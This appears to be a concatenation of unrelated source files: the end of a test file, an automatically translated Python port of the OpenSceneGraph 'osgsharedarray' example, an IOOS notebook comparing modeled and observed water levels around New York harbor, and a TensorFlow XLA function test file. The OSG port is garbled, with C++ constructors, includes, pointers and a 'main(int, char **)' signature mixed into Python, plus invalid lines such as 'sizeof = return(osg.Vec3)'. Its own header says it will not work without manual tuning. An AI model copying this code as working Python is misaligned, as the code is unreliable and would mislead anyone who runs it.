self.run_and_report(s1, s2, "assert_same_structure_60_elem")
if __name__ == "__main__":
test.main()
|
|
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgsharedarray"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osg
from osgpypp import osgViewer
# Translated from file 'osgsharedarray.cpp'
# OpenSceneGraph example, osgsharedarray.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osg/Array>
#include <osg/Geode>
#include <osg/Geometry>
#include <osgViewer/Viewer>
#* This class is an example of how to create your own subclass of osg.Array. This
# * is useful if your application has data in its own form of storage and you don't
# * want to make another copy into one of the predefined osg.Array classes.
# *
# * @note This is not really intended to be a useful subclass of osg.Array. It
# * doesn't do anything smart about memory management. It is simply intended as
# * an example you can follow to create your own subclasses of osg.Array for
# * your application's storage requirements.
#
class MyArray (osg.Array) :
#* Default ctor. Creates an empty array.
MyArray() :
osg.Array(osg.Array.Vec3ArrayType,3,GL_FLOAT),
_numElements(0),
_ptr(NULL)
#* "Normal" ctor.
# *
# * @param no The number of elements in the array.
# * @param ptr Pointer to the data. This class just keeps that
# * pointer. It doesn't manage the memory.
#
MyArray(unsigned int no, osg.Vec3* ptr) :
osg.Array(osg.Array.Vec3ArrayType,3,GL_FLOAT),
_numElements(no),
_ptr(ptr)
#* Copy ctor.
MyArray( MyArray other, osg.CopyOp copyop) :
osg.Array(osg.Array.Vec3ArrayType,3,GL_FLOAT),
_numElements(other._numElements),
_ptr(other._ptr)
#* What type of object would clone return?
def cloneType():
return MyArray()
#* Create a copy of the object.
def clone(copyop):
return MyArray(*this,copyop)
#* Accept method for ArrayVisitors.
# *
# * @note This will end up in ArrayVisitor.apply(osg.Array).
#
def accept(av):
av.apply(*this)
#* Const accept method for ArrayVisitors.
# *
# * @note This will end up in ConstArrayVisitor.apply( osg.Array).
#
def accept(cav):
cav.apply(*this)
#* Accept method for ValueVisitors.
def accept(index, vv):
vv.apply(_ptr[index])
#* Const accept method for ValueVisitors.
def accept(index, cvv):
cvv.apply(_ptr[index])
#* Compare method.
# * Return -1 if lhs element is less than rhs element, 0 if equal,
# * 1 if lhs element is greater than rhs element.
#
def compare(lhs, rhs):
elem_lhs = _ptr[lhs]
elem_rhs = _ptr[rhs]
if elem_lhs<elem_rhs : return -1
if elem_rhs<elem_lhs : return 1
return 0
def getElementSize():
sizeof = return(osg.Vec3)
#* Returns a pointer to the first element of the array.
def getDataPointer():
return _ptr
#* Returns the number of elements in the array.
def getNumElements():
return _numElements
#* Returns the number of bytes of storage required to hold
# * all of the elements of the array.
#
def getTotalDataSize():
return _numElements * sizeof(osg.Vec3)
def reserveArray(num):
OSG_NOTICE, "reserveArray() not supported"
def resizeArray(num):
OSG_NOTICE, "resizeArray() not supported"
_numElements = unsigned int()
_ptr = osg.Vec3*()
#* The data values for the example. Simply defines a cube with
# * per-face colors and normals.
#
osg.Vec3 myVertices[] = osg.Vec3(-1.,-1., 1.),
osg.Vec3( 1.,-1., 1.),
osg.Vec3( 1., 1., 1.),
osg.Vec3(-1., 1., 1.),
osg.Vec3( 1.,-1., 1.),
osg.Vec3( 1.,-1.,-1.),
osg.Vec3( 1., 1.,-1.),
osg.Vec3( 1., 1., 1.),
osg.Vec3( 1.,-1.,-1.),
osg.Vec3(-1.,-1.,-1.),
osg.Vec3(-1., 1.,-1.),
osg.Vec3( 1., 1.,-1.),
osg.Vec3(-1.,-1.,-1.),
osg.Vec3(-1.,-1., 1.),
osg.Vec3(-1., 1., 1.),
osg.Vec3(-1., 1.,-1.),
osg.Vec3(-1., 1., 1.),
osg.Vec3( 1., 1., 1.),
osg.Vec3( 1., 1.,-1.),
osg.Vec3(-1., 1.,-1.),
osg.Vec3(-1.,-1.,-1.),
osg.Vec3( 1.,-1.,-1.),
osg.Vec3( 1.,-1., 1.),
osg.Vec3(-1.,-1., 1.),
osg.Vec3 myNormals[] = osg.Vec3( 0., 0., 1.),
osg.Vec3( 0., 0., 1.),
osg.Vec3( 0., 0., 1.),
osg.Vec3( 0., 0., 1.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 1., 0., 0.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3( 0., 0.,-1.),
osg.Vec3(-1., 0., 0.),
osg.Vec3(-1., 0., 0.),
osg.Vec3(-1., 0., 0.),
osg.Vec3(-1., 0., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0., 1., 0.),
osg.Vec3( 0.,-1., 0.),
osg.Vec3( 0.,-1., 0.),
osg.Vec3( 0.,-1., 0.),
osg.Vec3( 0.,-1., 0.)
osg.Vec4 myColors[] = osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 1., 0., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 0., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 1., 1., 0., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 0., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 1., 0., 1., 1.),
osg.Vec4( 0., 1., 1., 1.),
osg.Vec4( 0., 1., 1., 1.),
osg.Vec4( 0., 1., 1., 1.),
osg.Vec4( 0., 1., 1., 1.)
#* Create a Geode that describes a cube using our own
# * subclass of osg.Array for the vertices. It uses
# * the "regular" array classes for all of the other
# * arrays.
# *
# * Creating your own Array class isn't really very
# * useful for a tiny amount of data like this. You
# * could just go ahead and copy the data into one of
# * the "regular" Array classes like this does for
# * normals and colors. The point of creating your
# * own subclass of Array is for use with datasets
# * that are much larger than anything you could
# * create a simple example from. In that case, you
# * might not want to create a copy of the data in
# * one of the Array classes that comes with OSG, but
# * instead reuse the copy your application already
# * has and wrap it up in a subclass of osg.Array
# * that presents the right interface for use with
# * OpenSceneGraph.
# *
# * Note that I'm only using the shared array for the
# * vertices. You could do something similar for any
# * of the Geometry node's data arrays.
#
def createGeometry():
geode = osg.Geode()
# create Geometry
geom = osg.Geometry(osg.Geometry())
# add vertices using MyArray class
numVertices = sizeof(myVertices)/sizeof(myVertices[0])
geom.setVertexArray(MyArray(numVertices,const_cast<osg.Vec3*>(myVertices[0])))
# add normals
numNormals = sizeof(myNormals)/sizeof(myNormals[0])
geom.setNormalArray(osg.Vec3Array(numNormals,const_cast<osg.Vec3*>(myNormals[0])), osg.Array.BIND_PER_VERTEX)
# add colors
numColors = sizeof(myColors)/sizeof(myColors[0])
normal_array = osg.Vec4Array(numColors,const_cast<osg.Vec4*>(myColors[0]))
geom.setColorArray(normal_array, osg.Array.BIND_PER_VERTEX)
# add PrimitiveSet
geom.addPrimitiveSet(osg.DrawArrays(osg.PrimitiveSet.QUADS, 0, numVertices))
# Changing these flags will tickle different cases in
# Geometry.drawImplementation. They should all work fine
# with the shared array.
geom.setUseVertexBufferObjects(False)
geom.setUseDisplayList(False)
geode.addDrawable( geom )
return geode
int main(int , char **)
# construct the viewer.
viewer = osgViewer.Viewer()
# add model to viewer.
viewer.setSceneData( createGeometry() )
# create the windows and run the threads.
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
|
|
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <markdowncell>
# # IOOS System Test: [Extreme Events Theme]
# (https://github.com/ioos/system-test/wiki/Development-of-Test-Themes#
# wiki-theme-2-extreme-events): Inundation
#
# ### Compare modeled water levels with observations for a specified bounding box
# and time period using IOOS recommended service standards for catalog search
# (CSW) and data retrieval (OPeNDAP & SOS).
#
# * Query CSW to find datasets that match criteria
# * Extract OPeNDAP data endpoints from model datasets and SOS endpoints from
# observational datasets
# * OPeNDAP model datasets will be granules
# * SOS endpoints may be datasets (from ncSOS) or collections of datasets (from
# NDBC, CO-OPS SOS servers)
# * Filter SOS services to obtain datasets
# * Extract data from SOS datasets
# * Extract data from model datasets at locations of observations
# * Compare time series data on same vertical datum
# <codecell>
# Standard Library.
from warnings import warn
from datetime import datetime, timedelta
# Scientific stack.
import iris
iris.FUTURE.netcdf_promote = True
import numpy as np
import cartopy.crs as ccrs
import matplotlib.pyplot as plt
from matplotlib.transforms import offset_copy
from cartopy.io.img_tiles import MapQuestOpenAerial
from pandas import DataFrame, date_range, read_csv, concat
from iris.exceptions import CoordinateNotFoundError, ConstraintMismatchError
# Custom IOOS/ASA modules (available at PyPI).
from owslib import fes
from owslib.csw import CatalogueServiceWeb
from pyoos.collectors.coops.coops_sos import CoopsSos
# Local imports
from utilities import name_list, sos_name
from utilities import (fes_date_filter, coops2df, find_timevar, find_ij, nearxy,
service_urls, mod_df)
# <markdowncell>
# ### Specify a time range and bounding box of interest:
# <codecell>
dates = {'Hurricane sandy':
[datetime(2012, 10, 26), datetime(2012, 11, 2)],
'2014 Feb 10-15 Storm':
[datetime(2014, 2, 10), datetime(2014, 2, 15)],
'2014 Recent': [datetime(2014, 3, 8), datetime(2014, 3, 11)],
'2011': [datetime(2013, 4, 20), datetime(2013, 4, 24)]}
jd_now = datetime.utcnow()
jd_start, jd_stop = jd_now - timedelta(days=3), jd_now + timedelta(days=3)
start_date = jd_start.strftime('%Y-%m-%d %H:00')
stop_date = jd_stop.strftime('%Y-%m-%d %H:00')
jd_start = datetime.strptime(start_date, '%Y-%m-%d %H:%M')
jd_stop = datetime.strptime(stop_date, '%Y-%m-%d %H:%M')
print('%s to %s' % (start_date, stop_date))
# <codecell>
# Bounding Box [lon_min, lat_min, lon_max, lat_max]
area = {'Hawaii': [-160.0, 18.0, -154., 23.0],
'Gulf of Maine': [-72.0, 41.0, -69.0, 43.0],
'New York harbor region': [-75., 39., -71., 41.5]}
box = area['New York harbor region']
# <markdowncell>
# ### Search CSW for datasets of interest
# <codecell>
if False:
from IPython.core.display import HTML
url = 'http://www.ngdc.noaa.gov/geoportal/'
HTML('<iframe src=%s width=950 height=400></iframe>' % url)
# <codecell>
# Connect to CSW, explore it's properties.
CSW = {'NGDC Geoportal':
'http://www.ngdc.noaa.gov/geoportal/csw',
'USGS WHSC Geoportal':
'http://geoport.whoi.edu/geoportal/csw',
'NODC Geoportal: granule level':
'http://www.nodc.noaa.gov/geoportal/csw',
'NODC Geoportal: collection level':
'http://data.nodc.noaa.gov/geoportal/csw',
'NRCAN CUSTOM':
'http://geodiscover.cgdi.ca/wes/serviceManagerCSW/csw',
'USGS Woods Hole GI_CAT':
'http://geoport.whoi.edu/gi-cat/services/cswiso',
'USGS CIDA Geonetwork':
'http://cida.usgs.gov/gdp/geonetwork/srv/en/csw',
'USGS Coastal and Marine Program':
'http://cmgds.marine.usgs.gov/geonetwork/srv/en/csw',
'USGS Woods Hole Geoportal':
'http://geoport.whoi.edu/geoportal/csw',
'CKAN testing site for new Data.gov':
'http://geo.gov.ckan.org/csw',
'EPA':
'https://edg.epa.gov/metadata/csw',
'CWIC':
'http://cwic.csiss.gmu.edu/cwicv1/discovery'}
endpoint = CSW['NGDC Geoportal']
csw = CatalogueServiceWeb(endpoint, timeout=60)
csw.version
# <codecell>
csw.get_operation_by_name('GetRecords').constraints
# <markdowncell>
# ### Convert User Input into FES filters.
# <codecell>
start, stop = fes_date_filter(start_date, stop_date)
bbox = fes.BBox(box)
# <codecell>
or_filt = fes.Or([fes.PropertyIsLike(propertyname='apiso:AnyText',
literal=('*%s*' % val),
escapeChar='\\',
wildCard='*',
singleChar='?') for val in name_list])
# <markdowncell>
# ROMS model output often has Averages and History files. The Averages files are usually averaged over a tidal cycle or more, while the History files are snapshots at that time instant. We are not interested in averaged data for this test, so in the cell below we remove any Averages files here by removing any datasets that have the term "Averages" in the metadata text. A better approach would be to look at the `cell_methods` attributes propagated through to some term in the ISO metadata, but this is not implemented yet, as far as I know
# <codecell>
val = 'Averages'
not_filt = fes.Not([fes.PropertyIsLike(propertyname='apiso:AnyText',
literal=('*%s*' % val),
escapeChar='\\',
wildCard='*',
singleChar='?')])
filter_list = [fes.And([bbox, start, stop, or_filt, not_filt])]
# <markdowncell>
# Try request using multiple filters "and" syntax: [[filter1,filter2]].
# <codecell>
csw.getrecords2(constraints=filter_list, maxrecords=1000, esn='full')
print(len(csw.records.keys()))
# <markdowncell>
# Now print out some titles
# <codecell>
for rec, item in csw.records.items():
print(item.title)
# <markdowncell>
# Print out all the OPeNDAP Data URL endpoints
# <codecell>
dap_urls = service_urls(csw.records,
service='odp:url')
print("\n".join(dap_urls))
# <markdowncell>
# Print out all the SOS Data URL endpoints
# <codecell>
sos_urls = service_urls(csw.records,
service='sos:url')
print("\n".join(sos_urls))
# <markdowncell>
# ## 1. Get observations from SOS
# Here we are using a custom class from pyoos to read the CO-OPS SOS. This is definitely unsavory, as the whole point of using a standard is avoid the need for custom classes for each service. Need to examine the consequences of removing this and just going with straight SOS service using OWSLib.
# <codecell>
collector = CoopsSos()
collector.set_datum('NAVD') # MSL
collector.server.identification.title
collector.start_time = jd_start
collector.end_time = jd_stop
collector.variables = [sos_name]
# <codecell>
ofrs = collector.server.offerings
print(len(ofrs))
for p in ofrs[700:710]:
print(p)
# <markdowncell>
# ### Find the SOS stations within our bounding box and time extent
# We would like to just use a filter on a collection to get a new collection, but PYOOS doesn't do that yet. So we do a GetObservation request for a collection, including a bounding box, and asking for one value at the start of the time period of interest. We use that to do a bounding box filter on the SOS server, which returns 1 point for each station found. So for 3 stations, we get back 3 records, in CSV format. We can strip the station ids from the CSV, and then we have a list of stations we can use with pyoos. The template for the GetObservation query for the bounding box filtered collection was generated using the GUI at http://opendap.co-ops.nos.noaa.gov/ioos-dif-sos/
# <codecell>
iso_start = jd_start.strftime('%Y-%m-%dT%H:%M:%SZ')
print(iso_start)
box_str = ','.join(str(e) for e in box)
print(box_str)
# <codecell>
url = ('http://opendap.co-ops.nos.noaa.gov/ioos-dif-sos/SOS?'
'service=SOS&request=GetObservation&version=1.0.0&'
'observedProperty=%s&offering=urn:ioos:network:NOAA.NOS.CO-OPS:'
'WaterLevelActive&featureOfInterest=BBOX:%s&responseFormat='
'text/csv&eventTime=%s' % (sos_name, box_str, iso_start))
print(url)
obs_loc_df = read_csv(url)
# <codecell>
obs_loc_df.head()
# <codecell>
stations = [sta.split(':')[-1] for sta in obs_loc_df['station_id']]
obs_lon = [sta for sta in obs_loc_df['longitude (degree)']]
obs_lat = [sta for sta in obs_loc_df['latitude (degree)']]
print(stations)
# <markdowncell>
# Generate a uniform 6-min time base for model/data comparison:
# <codecell>
ts_rng = date_range(start=jd_start, end=jd_stop, freq='6Min')
ts = DataFrame(index=ts_rng)
print(jd_start, jd_stop)
print(len(ts))
# <markdowncell>
# Create a list of obs dataframes, one for each station:
# <codecell>
obs_df = []
sta_names = []
sta_failed = []
for sta in stations:
b = coops2df(collector, sta, sos_name)
name = b.name
sta_names.append(name)
print(name)
if b.empty:
sta_failed.append(name)
b = DataFrame(np.arange(len(ts)) * np.NaN, index=ts.index, columns=['Observed Data'])
b.name = name
# Limit interpolation to 10 points (10 @ 6min = 1 hour).
col = 'Observed Data'
concatenated = concat([b, ts], axis=1).interpolate(limit=10)[col]
obs_df.append(DataFrame(concatenated))
obs_df[-1].name = b.name
# <codecell>
geodetic = ccrs.Geodetic(globe=ccrs.Globe(datum='WGS84'))
tiler = MapQuestOpenAerial()
fig, ax = plt.subplots(figsize=(8, 8), subplot_kw=dict(projection=tiler.crs))
# Open Source Imagery from MapQuest (max zoom = 16?)
zoom = 8
extent = [box[0], box[2], box[1], box[3]]
ax.set_extent(extent, geodetic)
ax.add_image(tiler, zoom)
ax.scatter(obs_lon, obs_lat, marker='o', s=30,
color='cyan', transform=ccrs.PlateCarree())
geodetic_transform = ccrs.Geodetic()._as_mpl_transform(ax)
text_transform = offset_copy(geodetic_transform, units='dots', x=-7, y=+7)
for x, y, label in zip(obs_lon, obs_lat, sta_names):
ax.text(x, y, label, horizontalalignment='left',
transform=text_transform, color='white')
gl = ax.gridlines(draw_labels=True)
gl.xlabels_top = gl.ylabels_right = False
ax.set_title('Water Level Gauge Locations')
# <markdowncell>
# ### Get model output from OPeNDAP URLS
# Try to open all the OPeNDAP URLS using Iris from the British Met Office. If 1D, assume dataset is data, if 2D assume dataset is an unstructured grid model, and if 3D, assume it's a structured grid model.
# <markdowncell>
# Construct an Iris contraint to load only cubes that match the std_name_list:
# <codecell>
print('\n'.join(name_list))
name_in_list = lambda cube: cube.standard_name in name_list
constraint = iris.Constraint(cube_func=name_in_list)
# <markdowncell>
# Use only data within 0.04 degrees (about 4 km).
# <codecell>
max_dist = 0.04
# <markdowncell>
# Use only data where the standard deviation of the time series exceeds 0.01 m
# (1 cm) this eliminates flat line model time series that come from land
# points that should have had missing values.
# <codecell>
min_var = 0.01
# <codecell>
for url in dap_urls:
try:
a = iris.load_cube(url, constraint)
# convert to units of meters
# a.convert_units('m') # this isn't working for unstructured data
# take first 20 chars for model name
mod_name = a.attributes['title'][0:20]
r = a.shape
timevar = find_timevar(a)
lat = a.coord(axis='Y').points
lon = a.coord(axis='X').points
jd = timevar.units.num2date(timevar.points)
start = timevar.units.date2num(jd_start)
istart = timevar.nearest_neighbour_index(start)
stop = timevar.units.date2num(jd_stop)
istop = timevar.nearest_neighbour_index(stop)
# Only proceed if we have data in the range requested.
if istart != istop:
nsta = len(obs_lon)
if len(r) == 3:
print('[Structured grid model]:', url)
d = a[0, :, :].data
# Find the closest non-land point from a structured grid model.
if len(lon.shape) == 1:
lon, lat = np.meshgrid(lon, lat)
j, i, dd = find_ij(lon, lat, d, obs_lon, obs_lat)
for n in range(nsta):
# Only use if model cell is within 0.1 degree of requested
# location.
if dd[n] <= max_dist:
arr = a[istart:istop, j[n], i[n]].data
if arr.std() >= min_var:
c = mod_df(arr, timevar, istart, istop,
mod_name, ts)
name = obs_df[n].name
obs_df[n] = concat([obs_df[n], c], axis=1)
obs_df[n].name = name
elif len(r) == 2:
print('[Unstructured grid model]:', url)
# Find the closest point from an unstructured grid model.
index, dd = nearxy(lon.flatten(), lat.flatten(),
obs_lon, obs_lat)
for n in range(nsta):
# Only use if model cell is within 0.1 degree of requested
# location.
if dd[n] <= max_dist:
arr = a[istart:istop, index[n]].data
if arr.std() >= min_var:
c = mod_df(arr, timevar, istart, istop,
mod_name, ts)
name = obs_df[n].name
obs_df[n] = concat([obs_df[n], c], axis=1)
obs_df[n].name = name
elif len(r) == 1:
print('[Data]:', url)
except (ValueError, RuntimeError, CoordinateNotFoundError,
ConstraintMismatchError) as e:
warn("\n%s\n" % e)
pass
# <codecell>
for df in obs_df:
ax = df.plot(figsize=(14, 6), title=df.name, legend=False)
plt.setp(ax.lines[0], linewidth=4.0, color='0.7', zorder=1)
ax.legend()
ax.set_ylabel('m')
# <markdowncell>
# Plot again, but now remove the mean offset (relative to data) from all plots.
# <codecell>
for df in obs_df:
amean = df[jd_start:jd_now].mean()
name = df.name
df = df - amean + amean.ix[0]
df.name = name
ax = df.plot(figsize=(14, 6), title=df.name, legend=False)
plt.setp(ax.lines[0], linewidth=4.0, color='0.7', zorder=1)
ax.legend()
ax.set_ylabel('m')
print(amean.ix[0] - amean)
|
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import gc
import re
from tensorflow.compiler.tests import xla_test
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
@test_util.with_eager_op_as_function
class DefFunctionTest(xla_test.XLATestCase):
def testAutoclusteringWithTfFunction(self):
if 'tpu' in self.device.lower():
self.skipTest('Autoclustering does not run on TPU')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=False)
def outer(a, b, c):
return a * inner(b, c) + c
@def_function.function(jit_compile=True)
def inner(b, c):
return b + c * b
i1 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0])
i2 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0])
i3 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0])
with context.collect_graphs(optimized=True) as graphs:
outer(i1, i2, i3)
if test_util.is_xla_enabled():
self.assertIn('_XlaRun', [n.op for n in graphs[0].node])
else:
self.assertNotIn('_XlaRun', [n.op for n in graphs[0].node])
def testBasic(self):
with ops.device('device:{}:0'.format(self.device)):
def fn(x, a):
return x + a
func = def_function.function(fn, jit_compile=False)
xla_func = def_function.function(fn, jit_compile=True)
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertAllClose([2, 3, 3, 4, 4], func(inputs, 1))
self.assertAllClose([2, 3, 3, 4, 4], xla_func(inputs, 1))
def testBasicInt32(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, a):
return x + a
inputs = constant_op.constant([1, 2, 2, 3, 3], dtype=dtypes.int32)
self.assertAllClose([2, 3, 3, 4, 4], fn(inputs, 1))
def testDerivative(self):
with ops.device('device:{}:0'.format(self.device)):
def fn(x, a):
return 2 * x + a
xla_func = def_function.function(fn, jit_compile=True)
with backprop.GradientTape() as tape:
inputs = constant_op.constant([1., 2., 2., 3., 3.])
tape.watch(inputs)
outputs = xla_func(inputs, 1)
self.assertAllClose([2, 2, 2, 2, 2], tape.gradient(outputs, inputs))
# pylint: disable=protected-access
(forward, backward) = xla_func.get_concrete_function(
inputs, 1)._delayed_rewrite_functions.forward_backward()
# Check that the must-compile attribute gets correctly propagated to the
# created derivatives.
self.assertTrue(backward.function_def.attr['_XlaMustCompile'])
self.assertTrue(forward.definition.attr['_XlaMustCompile'])
# Calling function with jit_compile=True from
# jit_compile=False should compile the inner func.
def testNestedCall(self):
if 'tpu' in self.device.lower():
self.skipTest('b/162800687: Inner function runs on host')
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, a):
return x + a
@def_function.function(jit_compile=False)
def fn2(x, a):
return fn(x, a)
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertAllClose([2, 3, 3, 4, 4], fn2(inputs, 1))
def testNestedCallUnsupportedOps(self):
if 'tpu' in self.device.lower():
self.skipTest('Outside compilation will extract string_length to CPU')
with ops.device('device:{}:0'.format(self.device)):
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x))
xla_func = def_function.function(fn, jit_compile=True)
def fn2(x):
return xla_func(x)
func = def_function.function(fn2, jit_compile=False)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(
errors.InvalidArgumentError, 'legalization failed'
if test_util.is_mlir_bridge_enabled() else 'unsupported operations'):
func(inputs)
def testUnsupportedOps(self):
with ops.device('device:{}:0'.format(self.device)):
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x))
xla_func = def_function.function(fn, jit_compile=True)
with self.assertRaisesRegex(
errors.InvalidArgumentError, 'legalization failed'
if test_util.is_mlir_bridge_enabled() else 'unsupported operations'):
xla_func(constant_op.constant([3.1, 3.2]))
def testCollectiveReduceChannelId(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, y):
t0 = collective_ops.all_reduce_v2(
t=x, group_size=2, group_key=1, instance_key=1)
t1 = collective_ops.all_reduce_v2(
t=y, group_size=2, group_key=1, instance_key=1)
return t0 + t1
inputs = constant_op.constant([1.0, 2.0, 3.0])
# Make sure 2 different channel ids are assigned to the 2 all-reduce
# instructions generated by XLA.
hlo_str = fn.experimental_get_compiler_ir(inputs, inputs)()
matches = re.findall('channel_id=([0-9]*),', hlo_str)
self.assertLen(matches, 2)
self.assertNotEqual(matches[0], matches[1])
@test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not'
'support stack traces')
def testPythonLocationInMetadata(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x, y):
return x + y
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertIn('def_function_xla_jit_test',
fn.experimental_get_compiler_ir(inputs, inputs)())
@test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not'
'support stack traces')
def testPythonLocationNestedInMetadata(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x, y):
return x + y
@def_function.function(jit_compile=True)
def g(x, y):
return f(x, y)
inputs = constant_op.constant([1, 2, 2, 3, 3])
self.assertIn('def_function_xla_jit_test',
g.experimental_get_compiler_ir(inputs, inputs)())
def testPythonStackTrace(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT2
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT2'):
fn(inputs)
def testPythonStackTraceUncompiledWithinCompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT3
@def_function.function(jit_compile=True)
def outer(x):
return fn(x)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT3'):
outer(inputs)
@test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not'
'support stack traces')
def testPythonStackTraceCompiledWithinUncompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT1
@def_function.function
def outer(x):
return fn(x)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT1'):
outer(inputs)
@test_util.disable_mlir_bridge('TODO(b/155782411): MLIR bridge does not'
'support stack traces')
def testPythonStackTraceCompiledWithinCompiled(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def fn(x):
return string_ops.string_length(
string_ops.string_format('{}', x)) # COMMENT4
@def_function.function
def outer(x):
return fn(x)
inputs = constant_op.constant([1, 2, 2, 3, 3])
with self.assertRaisesRegex(errors.InvalidArgumentError, 'COMMENT4'):
outer(inputs)
def testFunctionGradient(self):
with ops.device('device:{}:0'.format(self.device)):
v = resource_variable_ops.ResourceVariable(2.0)
def fn(x):
return v * x
func = def_function.function(fn, jit_compile=False)
xla_func = def_function.function(fn, jit_compile=True)
def run_and_check(test_func):
x = constant_op.constant(3.0)
with backprop.GradientTape() as tape:
y = test_func(x)
dy = tape.gradient(y, v)
self.assertAllClose(6.0, y)
self.assertAllClose(3.0, dy)
run_and_check(func)
run_and_check(xla_func)
@test_util.disable_mlir_bridge('TODO(b/162521846): MLIR bridge fails'
' msan, function library not found')
def testControlFlow(self):
with ops.device('device:{}:0'.format(self.device)):
@def_function.function(jit_compile=True)
def f(x):
assert control_flow_util.GraphOrParentsInXlaContext(
ops.get_default_graph())
x = ops.convert_to_tensor(x)
def body(i, a):
return i + 1, control_flow_ops.cond(i > 2, lambda: a + (x**2),
lambda: a + 3)
return control_flow_ops.while_loop(
lambda i, *_: i < 10,
body, (constant_op.constant(0), constant_op.constant(3.)),
maximum_iterations=10)[1]
@def_function.function(jit_compile=True)
def g(x):
x = ops.convert_to_tensor(x)
with backprop.GradientTape() as tape:
tape.watch(x)
y = f(x)
return y, tape.gradient(y, x)
# Test that XLA context gets correctly propagated.
g._get_concrete_function_garbage_collected(2.0)(2.0)
self.assertAllClose(40.0, f(2.0))
